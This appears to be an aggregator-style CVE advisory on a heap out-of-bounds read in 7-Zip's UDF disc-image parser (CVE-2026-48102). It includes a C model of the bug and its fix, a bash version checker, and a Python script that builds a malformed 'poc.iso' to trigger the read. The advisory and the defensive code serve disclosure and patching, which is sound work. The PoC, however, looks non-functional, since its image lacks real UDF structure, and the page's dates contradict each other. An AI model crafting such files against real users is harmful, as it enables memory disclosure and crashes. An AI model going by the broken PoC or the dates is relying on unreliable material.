CVE-2026-48102
Intro – CVE-2026-48102 is a heap out-of-bounds read vulnerability in 7-Zip’s UDF disc image handler, affecting versions 9.11 through 26.00. The flaw resides in `CFileId::Parse` (file CPP/7zip/Archive/Udf/UdfIn.cpp). The parser processes a File Identifier Descriptor (FID) whose variable-length fields, `idLen` (identifier length) and `impLen` (implementation use length), follow a 38-byte fixed part. After rejecting buffers shorter than 38 + idLen + impLen, the function advances a `processed` offset to 38 + impLen + idLen. It then runs an alignment loop that reads one byte from `p` per iteration, up to three times, until `processed` reaches a 4‑byte boundary. The bounds check `processed <= size` is performed only after that loop.
If `(38 + impLen + idLen) % 4 != 0` and `38 + impLen + idLen == size` (i.e., the buffer is exactly the size needed for the FID header and its payload), the loop reads 1–3 bytes past the end of the heap buffer allocated with `buf.Alloc((size_t)item.Size)`. This occurs because the buffer has no room for the padding bytes. The UDF handler is registered for `.iso` and `.udf` files and auto‑detected by signature. The out‑of‑bounds read triggers during `Open()` when a crafted UDF image is listed or extracted.
The impact is limited: an attacker can obtain a 1‑bit oracle per OOB byte by observing whether the open/extract operation succeeds or fails (information disclosure). Under hardened memory allocators (e.g., ones that guard heap boundaries), the access may cause a crash (denial of service). No write primitive is available, so arbitrary code execution is not possible. Version 26.01 fixes the issue by adding an extra bounds check inside the alignment loop.
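The alignment-loop bug and the 26.01-style fix side by side, as an added example written for this page rather than code taken from 7-Zip. It models `CFileId::Parse` on an in-memory buffer: the FID field offsets (idLen at byte 19, impLen at bytes 36–37, 38 fixed bytes before the variable part) follow the ECMA-167 File Identifier Descriptor layout and are an assumption; the names `parse_fid`, `build_fid`, `oob_reads_for` and `parse_result_for` are invented here; the descriptors are constructed test data padded with a canary so the model's out-of-bounds reads stay inside the backing array and can be counted safely. Running it shows that for a 39- or 41-byte descriptor the unhardened loop touches 1 or 3 bytes past `size` before the late check rejects the buffer, that the in-loop check refuses the same descriptor without any such read, and that a 40-byte descriptor passes both versions.

```c
/* Reduced model of the CFileId::Parse alignment bug (added example, not 7-Zip code).
 * Field offsets follow the ECMA-167 File Identifier Descriptor layout (assumption):
 *   0..15 tag, 16..17 version, 18 characteristics, 19 L_FI (idLen),
 *   20..35 ICB long_ad, 36..37 L_IU (impLen), then impUse[impLen], fileId[idLen],
 *   then padding up to the next 4-byte boundary. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FID_FIXED 38u        /* size of the fixed part of a FID */
#define CANARY    0xAAu      /* marks bytes that lie past the logical descriptor */

enum { FID_OK = 0, FID_ERR_SHORT = -1, FID_ERR_PAD = -2 };

/* Parse one FID from p[0..size-1]. With hardened == 0 the bounds check sits after
 * the alignment loop, as described for 9.11-26.00; with hardened != 0 it is also
 * performed inside the loop (the 26.01-style fix). *oob counts reads at index >= size.
 * What 7-Zip does with the values of the padding bytes is not modeled. */
static int parse_fid(const uint8_t *p, unsigned size, int hardened, unsigned *oob)
{
    *oob = 0;
    if (size < FID_FIXED)
        return FID_ERR_SHORT;
    unsigned idLen  = p[19];
    unsigned impLen = (unsigned)p[36] | ((unsigned)p[37] << 8);
    if (size < FID_FIXED + impLen + idLen)          /* the pre-loop validation */
        return FID_ERR_SHORT;
    unsigned processed = FID_FIXED + impLen + idLen;
    while (processed & 3) {                         /* alignment loop, 1-3 iterations */
        if (hardened && processed >= size)          /* the check the fix adds */
            return FID_ERR_PAD;
        if (processed >= size)
            (*oob)++;                               /* this read is out of bounds */
        volatile uint8_t pad = p[processed];        /* the offending read */
        (void)pad;
        processed++;
    }
    if (processed > size)                           /* the check that comes too late */
        return FID_ERR_SHORT;
    return FID_OK;
}

/* Build a FID with the given idLen/impLen into buf (capacity cap) and return its
 * logical size 38 + impLen + idLen (0 if it does not fit). Bytes past that size are
 * filled with CANARY, so the model's out-of-bounds reads stay inside the backing
 * array while still being counted. Constructed test data, not a real UDF image. */
static unsigned build_fid(uint8_t *buf, unsigned cap, unsigned idLen, unsigned impLen)
{
    unsigned size = FID_FIXED + impLen + idLen;
    if (size + 3 > cap)
        return 0;
    memset(buf, CANARY, cap);
    memset(buf, 0, size);
    buf[0] = 0x01; buf[1] = 0x01;                   /* TagIdentifier 257 = FID */
    buf[19] = (uint8_t)idLen;
    buf[36] = (uint8_t)(impLen & 0xff);
    buf[37] = (uint8_t)(impLen >> 8);
    memset(buf + FID_FIXED + impLen, 'A', idLen);   /* the file identifier itself */
    return size;
}

/* Number of bytes the alignment loop reads past the descriptor for these lengths. */
static unsigned oob_reads_for(unsigned idLen, unsigned impLen, int hardened)
{
    uint8_t buf[64];
    unsigned oob = 0;
    unsigned size = build_fid(buf, sizeof buf, idLen, impLen);
    if (size == 0)
        return 0;
    parse_fid(buf, size, hardened, &oob);
    return oob;
}

/* Result code of the parse for these lengths (FID_OK / FID_ERR_SHORT / FID_ERR_PAD). */
static int parse_result_for(unsigned idLen, unsigned impLen, int hardened)
{
    uint8_t buf[64];
    unsigned oob = 0;
    unsigned size = build_fid(buf, sizeof buf, idLen, impLen);
    if (size == 0)
        return FID_ERR_SHORT;
    return parse_fid(buf, size, hardened, &oob);
}

int main(void)
{
    static const unsigned cases[][2] = { {1, 0}, {2, 0}, {3, 0}, {1, 1} };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        unsigned idLen = cases[i][0], impLen = cases[i][1];
        printf("size=%2u  vulnerable: rc=%2d oob=%u | hardened: rc=%2d oob=%u\n",
               FID_FIXED + impLen + idLen,
               parse_result_for(idLen, impLen, 0), oob_reads_for(idLen, impLen, 0),
               parse_result_for(idLen, impLen, 1), oob_reads_for(idLen, impLen, 1));
    }
    return 0;
}
```

Compile with any C99 compiler and run; each output line shows the vulnerable and hardened outcome for one descriptor size. The model only counts reads at or beyond `size`; whether 7-Zip then accepts or rejects the image based on the values it read is what the oracle described above depends on, and is left out here.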
DailyCVE Form:
Platform: 7-Zip
Version: 9.11-26.00
Vulnerability: Heap OOB read
Severity: Low
Date: 2026-06-05
Prediction: 2026-05-22 (26.01)
What Undercode Say:
```bash
# Check installed 7-Zip version (Linux / Windows WSL); take the first dotted number,
# since p7zip prints "p7zip Version 16.02 ..." but the official build prints "7-Zip 23.01 ...".
ver=$(7z 2>&1 | grep -m1 -oE '[0-9]+\.[0-9]+')
# Quick detection script for CVE-2026-48102 (affected range: 9.11 through 26.00)
major=${ver%%.*}; minor=${ver#*.}; vuln=0
[ "${major:-0}" -eq 9 ] && [ "$minor" -ge 11 ] && vuln=1
[ "${major:-0}" -gt 9 ] && [ "$major" -lt 26 ] && vuln=1
[ "${major:-0}" -eq 26 ] && [ "$minor" -eq 0 ] && vuln=1
if [ -z "$ver" ]; then
  echo "Could not determine the 7-Zip version (is 7z on PATH?)."
elif [ "$vuln" -eq 1 ]; then
  echo "Vulnerable: 7-Zip $ver (CVE-2026-48102) → upgrade to 26.01+"
else
  echo "Not vulnerable or already patched."
fi
```
```python
# Minimal Python script to generate a malformed UDF image intended to trigger the OOB read
import struct

# UDF volume recognition sequence placeholder (16 bytes)
vol_rec_seq = b'\x00' * 16

# Malformed File Identifier Descriptor (FID)
# TagID=0x0101, idLen=1, impLen=0 -> size = 38+1+0 = 39 bytes
# 39 % 4 = 3, so one padding byte is needed to reach 40: the loop reads 1 OOB byte
fid = struct.pack('<HHI', 0x0101, 0x00, 39) + b'\x00' * 30 + b'\x01' * 1 + b'\x00' * 0
assert len(fid) == 39

with open('poc.iso', 'wb') as f:
    f.write(vol_rec_seq + fid)
print("[*] Created poc.iso. Run: 7z l poc.iso (expected crash/leak on vulnerable 7-Zip)")
```
Exploit:
No public exploit exists. However, a remote attacker can send a specially crafted `.iso` or `.udf` file (e.g., via email, download, or network share). When the victim lists or extracts the archive, the OOB read occurs. The attacker can probe the leaked bytes by observing whether 7‑Zip successfully opens the file (1‑bit oracle per byte). A deterministic crash may also be induced.
Protection:
Upgrade to 7‑Zip 26.01 or later. If immediate update is not possible, disable automatic parsing of UDF images (e.g., avoid opening untrusted `.iso` / `.udf` files). For developers using the 7‑Zip library, apply the patch from the upstream commit that adds the missing bounds check inside the alignment‑padding loop.
Impact:
– Information Disclosure: Up to 3 bytes of heap memory can be leaked per crafted file, potentially exposing sensitive data (e.g., other file names, buffer contents).
– Denial of Service: Under hardened allocators (like those with guard pages), the out‑of‑bounds read leads to a segmentation fault and application crash.
– No Code Execution: The vulnerability is read‑only; there is no write primitive, so arbitrary code execution is not achievable.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

